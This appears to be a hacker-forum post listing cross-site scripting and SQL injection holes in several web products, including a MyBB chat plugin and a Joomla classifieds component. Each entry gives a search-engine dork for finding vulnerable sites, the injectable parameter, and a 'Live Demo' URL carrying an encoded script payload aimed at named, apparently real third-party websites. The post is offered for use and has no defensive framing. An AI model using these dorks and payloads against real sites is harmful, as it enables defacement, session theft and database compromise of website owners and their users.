Espacio Ecuador XSS & SQLI

Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

Pej Studio & Nissi Infotech & Plante Graffix - XSS

Dork:

intext:"Created By Nissi Infotech"


Exploits:

http://target.com/name.php?id= [XSS & SQLI]


Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

MyBB Kingchat - XSS

Dork:

inurl:/kingchat.php?


Exploit:

/kingchat.php?notic


Change that /... into this to see exploit:

/kingchat.php?chat=2&l=2


Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Pro-Service - XSS Vulnerability

Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"


Exploit:

/resume_list.php?id=


Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Posted in: NEXUS.PRO.XSS

Joomla Aclassif - XSS

Dork:

inurl:"index.php?option=com_aclassif"


Exploit:

/index.php/component/aclassif/?


Example & Live Demo:

http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E